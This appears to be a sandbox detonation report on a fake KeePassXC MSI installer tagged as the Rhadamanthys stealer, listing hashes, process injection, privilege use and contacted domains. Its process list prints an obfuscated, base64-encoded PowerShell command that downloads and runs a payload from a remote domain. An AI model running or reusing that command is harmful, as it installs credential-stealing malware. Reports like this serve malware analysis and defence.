SHA512 b4da7fe3e32fe1dc89197ec4f0a84c1cb38ff4d872f842f4692d1520e2b39efd2d7e3b928a8e225d2504aadf72a923ed7ee7e3552988c6365b9b30358912d6ce

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libstdc++-6.dll

MD5 a33a65fc77e446a7dffb163e07610a8f
SHA1 a574215a88f53ef4f53d9b3c4b1905d6c2644202
SHA256 430d8036d0b568efe975fb7406156056e9ad16cd814d9b5de157704e85754a1a
SHA512 fe3b6af1d343e82b185fbb2fc5272f6f38baecd0a4e0d32c340f8ac0ee6d8b39661033ac64ecc58770fc7a2db328706b8c84abda756e42a88b6e972a9427d3ce

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libssp-0.dll

MD5 31037212185611990b67b6831fbddb39
SHA1 7f20b8975654604b54e9809a5668ba266de3733e
SHA256 af646bb5c7d4844de540f187dddcaa9b573fd0a34646a7d16f961ed32c691f21
SHA512 a1573605550baeeb18f75d49e27d785169e389c2eae3b10f76471feed2485680ed785c66d28eeeea7cfdd0a8c6e539b7b872a4c7c93cd29713f8a500ab03c1e6

C:\Windows\Installer\e5737c9.msi

MD5 531a806e5efce1d6ee6085e67f518029
SHA1 45e6d6242fe8ef3986b0f2b66c72226f285bdd06
SHA256 67ecba82950d8dfefe1b7c8564f959cdb35601dbc9a4b010bd929be7d1ae240c
SHA512 2df8901814180b2de3ffab09042c4be7f95ffb98d471f075477dead3500a046dd14e15946b3b9d72b7b8997fa745e1f866b1b518dea4b67a6ce548c0f895a4a1

memory/1988-192-0x0000000000770000-0x0000000000798000-memory.dmp

memory/4028-199-0x0000018D25230000-0x0000018D25252000-memory.dmp

memory/3492-208-0x0000000074C80000-0x0000000074D7A000-memory.dmp

memory/3492-207-0x00000000738D0000-0x0000000073AAB000-memory.dmp

memory/3492-206-0x0000000074D80000-0x0000000074D93000-memory.dmp

memory/3492-211-0x0000000072BC0000-0x000000007331D000-memory.dmp

memory/3492-217-0x0000000072230000-0x00000000722B0000-memory.dmp

memory/3492-215-0x0000000062D80000-0x0000000062DBB000-memory.dmp

memory/3492-224-0x0000000071810000-0x0000000071A0A000-memory.dmp

memory/3492-231-0x0000000071290000-0x0000000071357000-memory.dmp

memory/3492-230-0x0000000071410000-0x0000000071460000-memory.dmp

memory/3492-229-0x00000000713C0000-0x000000007140E000-memory.dmp

memory/3492-228-0x0000000071640000-0x0000000071685000-memory.dmp

memory/3492-227-0x0000000071540000-0x0000000071635000-memory.dmp

memory/3492-226-0x00000000716F0000-0x0000000071802000-memory.dmp

memory/3492-225-0x0000000071690000-0x00000000716EC000-memory.dmp

memory/3492-218-0x0000000072320000-0x000000007298F000-memory.dmp

memory/3492-223-0x0000000071A10000-0x0000000071D58000-memory.dmp

memory/3492-222-0x0000000061840000-0x000000006185A000-memory.dmp

memory/3492-221-0x00000000721A0000-0x00000000721DA000-memory.dmp

memory/3492-220-0x00000000721E0000-0x00000000721F8000-memory.dmp

memory/3492-219-0x0000000072200000-0x0000000072226000-memory.dmp

memory/3492-216-0x00000000722B0000-0x0000000072317000-memory.dmp

memory/3492-214-0x0000000072990000-0x0000000072B51000-memory.dmp

memory/3492-213-0x0000000072B60000-0x0000000072BBD000-memory.dmp

memory/3492-212-0x0000000073320000-0x00000000738AA000-memory.dmp

memory/3492-210-0x00000000738B0000-0x00000000738C1000-memory.dmp

memory/3492-209-0x0000000074C60000-0x0000000074C7C000-memory.dmp

memory/3492-205-0x0000000074DA0000-0x0000000074DC6000-memory.dmp

memory/3492-204-0x00000000001F0000-0x00000000007BF000-memory.dmp

memory/1988-244-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/4028-276-0x0000018D27680000-0x0000018D2769C000-memory.dmp

memory/4028-304-0x0000018D27F30000-0x0000018D280F2000-memory.dmp

memory/4028-305-0x0000018D28100000-0x0000018D28628000-memory.dmp

memory/1988-333-0x0000000000770000-0x0000000000798000-memory.dmp

memory/1988-336-0x0000000000770000-0x0000000000798000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 21:53

Reported

2024-06-01 22:11

Platform

win11-20240508-en

Max time kernel

91s

Max time network

136s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1080 created 2064 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\sihost.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1496 set thread context of 1080 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\e574100.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI42A7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI42C9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5598.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e574104.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF897ACE000E9856D6.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e574100.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF4508B638EFDABC96.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI42F9.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{BFB3A06C-96C7-42C4-A90F-78C892A36FF8} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFC3EF3208FE0EAA83.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI41DB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI42E9.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFCE8E4D867C59CEE8.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI42B8.tmp C:\Windows\system32\msiexec.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3524 wrote to memory of 1576 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3524 wrote to memory of 1576 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3524 wrote to memory of 1576 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1576 wrote to memory of 72 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 72 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 72 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3524 wrote to memory of 1496 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
PID 3524 wrote to memory of 1496 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
PID 3524 wrote to memory of 1496 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
PID 1496 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 1496 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 1496 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 1496 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 1080 wrote to memory of 2416 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1080 wrote to memory of 2416 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1080 wrote to memory of 3692 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 1080 wrote to memory of 3692 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 1080 wrote to memory of 3692 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 1080 wrote to memory of 3692 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 1080 wrote to memory of 3692 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C4246E35669DDEF460F00052F5831FC6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4346.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi4343.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr4344.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr4345.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe

"C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADUAMAA1ADMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1496 -ip 1496

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 924

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1080 -ip 1080

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 1080 -ip 1080

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1780

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1080 -ip 1080

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1776

Network

Country Destination Domain Proto
US 8.8.8.8:53 not-pass.com udp
US 172.67.219.67:80 not-pass.com tcp
US 172.67.219.67:443 not-pass.com tcp
US 8.8.8.8:53 67.219.67.172.in-addr.arpa udp
US 104.21.80.7:80 gachi-lane.com tcp
US 172.67.195.205:80 raur94.com tcp
US 172.67.195.205:443 raur94.com tcp
US 104.21.42.98:443 opensun.monster tcp
US 104.21.2.229:443 checkass.monster tcp

Files

C:\Windows\Installer\MSI41DB.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSI42F9.tmp

MD5 fb4665320c9da54598321c59cc5ed623
SHA1 89e87b3cc569edd26b5805244cfacb2f9c892bc7
SHA256 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59
SHA512 b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

memory/72-28-0x0000000002A60000-0x0000000002A96000-memory.dmp

memory/72-29-0x0000000005270000-0x000000000589A000-memory.dmp

memory/72-30-0x0000000005160000-0x0000000005182000-memory.dmp

memory/72-31-0x0000000005950000-0x00000000059B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tx4xnijq.sff.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/72-34-0x00000000059C0000-0x0000000005A26000-memory.dmp

memory/72-41-0x0000000005A30000-0x0000000005D87000-memory.dmp

memory/72-42-0x0000000005EE0000-0x0000000005EFE000-memory.dmp

memory/72-43-0x0000000005F30000-0x0000000005F7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss4346.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

memory/72-45-0x0000000007660000-0x0000000007CDA000-memory.dmp

memory/72-46-0x0000000006450000-0x000000000646A000-memory.dmp

memory/72-48-0x00000000064E0000-0x0000000006502000-memory.dmp

memory/72-47-0x00000000071E0000-0x0000000007276000-memory.dmp

memory/72-49-0x0000000008290000-0x0000000008836000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scr4344.ps1

MD5 c5e6cb1760799fcd20cd069562b9c480
SHA1 f7c5201de15fc2a655dd5fca39616a0c461ad6b3
